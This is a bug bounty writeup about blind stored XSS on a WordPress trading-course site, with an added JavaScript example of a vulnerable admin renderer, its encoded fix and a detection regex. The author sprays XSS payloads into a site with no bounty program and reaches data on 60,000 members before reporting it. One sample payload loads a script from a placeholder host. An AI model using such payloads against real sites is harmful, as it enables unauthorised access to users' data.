Hello, I’m a bug bounty hunter and security researcher from Morocco. In this writeup, I’ll walk you through how I gained access to sensitive data on a website that sells courses, mentorships, and seminars for both beginner and advanced traders. My goal was to access these resources for free.
Reconnaissance
Using Wappalyzer, I discovered that the site runs on WordPress. Whenever I see WordPress, my first step is to run WPScan.
WPScan Command:
wpscan --url https://targetsite.com
The target was running an outdated version of WordPress and outdated plugins, one of which was an admin dashboard vulnerable to blind XSS.
Potential Attack Scenarios
I listed several attack scenarios to gain free access to paid content:
Account takeover on paid accounts
- CSRF on critical forms (email, password)
- XSS leading to account takeover
Accessing the admin dashboard
- Fuzzing endpoints
- Information disclosure
- Spraying blind XSS payloads
Account Takeover on Paid Accounts
1. CSRF
The site lacked CSRF protection, meaning I could potentially change a victim’s email or password. However, this required user interaction, such as clicking a malicious link, so I moved on to other methods.
Accessing the Admin Dashboard
1. Fuzzing Endpoints
My primary tool is Burp Suite’s Turbo Intruder, but in this case, WPScan revealed an accessible listing of the uploads folder. Unfortunately, it only contained PDFs, images, and icons — nothing useful.
2. Spraying Blind XSS
I generally avoid spraying payloads, but given the outdated WordPress version and plugins, and the fact that the target didn’t have a bug bounty program, I expected low-hanging vulnerabilities like XSS. I started injecting blind XSS payloads from xss.report into every input I could find (e.g., the username, first and last name, email and password fields, and the User-Agent header).
Before I could move on to other attacks, an admin logged into the dashboard and the XSS payload I had inserted in the username field executed. I received an email notification confirming the execution.
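What happened in the admin dashboard, as an added example that is not code from the original writeup or from the site's plugin: a stored username is rendered into the admin user list by string concatenation, so a payload typed at signup fires in the admin's browser; the hardened version encodes each value for the context it lands in. The stored record, the payload and the callback host `example.invalid` are constructed placeholders (the writeup used xss.report). A small sweep function at the end is the check a defender would run over an existing user table for planted payloads.

```javascript
// Added example, not from the writeup: stored XSS via a username rendered in
// an admin page, the output-encoding fix, and a sweep for planted payloads.
const HOOK_URL = "https://example.invalid/hook.js"; // placeholder for a blind-XSS callback host

// Constructed stored record: the "username" is whatever the attacker typed at signup.
const STORED_USER = {
  id: 7,
  username: '"><script src="' + HOOK_URL + '"></script>',
  email: "user@example.com",
};

// Vulnerable: the row is built by concatenation, so the stored string is
// emitted verbatim and the script tag executes when an admin opens the list.
function renderUserRowVulnerable(user) {
  return '<tr><td><a href="/admin/user/' + user.id + '" title="' + user.username + '">' +
         user.username + '</a></td><td>' + user.email + '</td></tr>';
}

// HTML-encode the five characters that can change parsing context in element
// content and in double- or single-quoted attribute values.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Hardened: every untrusted value is encoded for the context it is placed in
// (URL path segment, attribute value, element text).
function renderUserRowSafe(user) {
  const id = encodeURIComponent(String(user.id));
  const name = escapeHtml(user.username);
  return '<tr><td><a href="/admin/user/' + id + '" title="' + name + '">' +
         name + '</a></td><td>' + escapeHtml(user.email) + '</td></tr>';
}

// Detection sweep: flag stored values that look like markup, event handlers
// or javascript: URLs. A coarse filter, meant for triage of an existing table.
const SUSPICIOUS = /<\s*\/?\s*[a-z]|\bon[a-z]+\s*=|javascript:/i;
function findSuspiciousUsers(users) {
  return users.filter(u => SUSPICIOUS.test(u.username) || SUSPICIOUS.test(u.email));
}
```

The same defect on a WordPress site is usually a plugin echoing a user field directly instead of through `esc_html()` / `esc_attr()`; the sweep is what you would run against `wp_users` and `wp_usermeta` after such a report, since the payload stays in the database until the account is cleaned up.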
Results
I gained access to the admin dashboard, which allowed me to access data on 60,000 members, including courses, mentorships, and videos.
Thankfully, after I sent a report via their email, the team was nice and active and patched the issues quickly.